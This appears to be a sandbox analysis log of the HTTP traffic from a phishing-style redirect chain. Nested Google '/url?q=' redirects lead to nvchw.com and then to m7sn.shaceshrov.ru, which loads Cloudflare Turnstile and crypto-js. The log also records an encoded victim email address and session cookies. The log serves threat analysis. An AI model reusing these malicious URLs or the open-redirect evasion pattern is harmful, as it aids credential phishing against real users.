F0RDQmQjEm&safe=active HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /url?q=https://www.google.com/url?q=https://www.google.com/url?q=.////amp/s/nvchw.com/winner/1dsbr/cmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=g-PPRcdlH3h6OszxCLUJmdxJxzb9DU2r7WPIpar31-6Llmgu4pZehPYCoyBCpP1aG2SflvTb4-SwNgUgMzbR5LvoP7UrD4hQ7MiTuX_C9y7PPyKtbQH4KUidPwnCAR4A1r-NZXFt-Zf-RsgJDMTu265zRQonxW8o4hL2kqyg89W_8qZhACh8qL5FB2A2TD6ET28ieBO4_w
Source: global trafficHTTP traffic detected: GET /url?q=https://www.google.com/url?q=.////amp/s/nvchw.com/winner/1dsbr/cmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=g-PPRcdlH3h6OszxCLUJmdxJxzb9DU2r7WPIpar31-6Llmgu4pZehPYCoyBCpP1aG2SflvTb4-SwNgUgMzbR5LvoP7UrD4hQ7MiTuX_C9y7PPyKtbQH4KUidPwnCAR4A1r-NZXFt-Zf-RsgJDMTu265zRQonxW8o4hL2kqyg89W_8qZhACh8qL5FB2A2TD6ET28ieBO4_w
Source: global trafficHTTP traffic detected: GET /url?q=.////amp/s/nvchw.com/winner/1dsbr/cmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=g-PPRcdlH3h6OszxCLUJmdxJxzb9DU2r7WPIpar31-6Llmgu4pZehPYCoyBCpP1aG2SflvTb4-SwNgUgMzbR5LvoP7UrD4hQ7MiTuX_C9y7PPyKtbQH4KUidPwnCAR4A1r-NZXFt-Zf-RsgJDMTu265zRQonxW8o4hL2kqyg89W_8qZhACh8qL5FB2A2TD6ET28ieBO4_w
Source: global trafficHTTP traffic detected: GET ////amp/s/nvchw.com/winner/1dsbr/cmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=g-PPRcdlH3h6OszxCLUJmdxJxzb9DU2r7WPIpar31-6Llmgu4pZehPYCoyBCpP1aG2SflvTb4-SwNgUgMzbR5LvoP7UrD4hQ7MiTuX_C9y7PPyKtbQH4KUidPwnCAR4A1r-NZXFt-Zf-RsgJDMTu265zRQonxW8o4hL2kqyg89W_8qZhACh8qL5FB2A2TD6ET28ieBO4_w
Source: global trafficHTTP traffic detected: GET /winner/1dsbr/cmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ== HTTP/1.1Host: nvchw.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: nvchw.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://nvchw.com/winner/1dsbr/cmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /IgEEv/ HTTP/1.1Host: m7sn.shaceshrov.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://nvchw.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://m7sn.shaceshrov.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://m7sn.shaceshrov.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://m7sn.shaceshrov.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://m7sn.shaceshrov.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ercd6/0x4AAAAAAA1mJe-KJqboZa9M/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://m7sn.shaceshrov.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=901886f16aa00f3b&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ercd6/0x4AAAAAAA1mJe-KJqboZa9M/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ercd6/0x4AAAAAAA1mJe-KJqboZa9M/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: m7sn.shaceshrov.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://m7sn.shaceshrov.ru/IgEEv/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inc1V1dMc1ZQRWxxdjRBcUI2WnJOL2c9PSIsInZhbHVlIjoiTTJ2TEZpQjdYaE1CUVJSNFNEY2tyYWh2eVRzTjlWeW83eTJZMzNJUmY3Q0VVL1FqOFNuaFAyMWsyM3FMc044bjJMV3VFZ3FJaU04K2toVnJDLzEyNnFpK2pWbzRtUFh5V3BSWjZ4N21DTSt6dmQ2UHZkUVhjUXZzdmZLTmhDV3EiLCJtYWMiOiJiMzAyOWExNzBkZDIwNmI4MWZlN2JjOGFjNWNlODlkYWQ0ZTdjMzJiZGU5N2MxYThhMTExMTRkYmIwZWMxNThkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilo2OVIvTXNSSHRqMDlLQ3FVdlRPMnc9PSIsInZhbHVlIjoiU3B6TldKbXVFODJRV2xjS3Y4V2xBNWhCSy9CaDg5ellaYkpTSTYxdnNDQ2dxOTlDdkFjWjBGaC9mQWdGMEMwYUYyYkZndHpNQm4xZGU3QzEvS1ZXRU42Ri9KZzhLc0RuUVRabFFUbWdxdVcvcnFmbFFVUDI4TzNzRmZBRDVkLy8iLCJtYWMiOiIxOTNmZGQyNzFmODNlNzE4NTIzMzAwY2UwYzJkZTE5NDBhMDNhODRiNDc4Zjc4ZTM3M2Y3ZTQ3ZjI2Y2U2ZTZiIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=901886f16aa00f3b&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/291047480:1736802921:6cAIPi7OVuOlpkf5Flnw52f_YS5aDPw6UYjgs6Pq5ck/901886f16aa00f3b/aug6nWRD8oN0o9STjshe0NwiJi9eHu1Mo_8PWDLYFtY-1736804242-1.1.1.1-iKIFn8UsYFPDX5tWJc7Ywt.PhMZpkhR5BUHWkehojzXA67DeXJ8KQhyBWtcjEArv HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
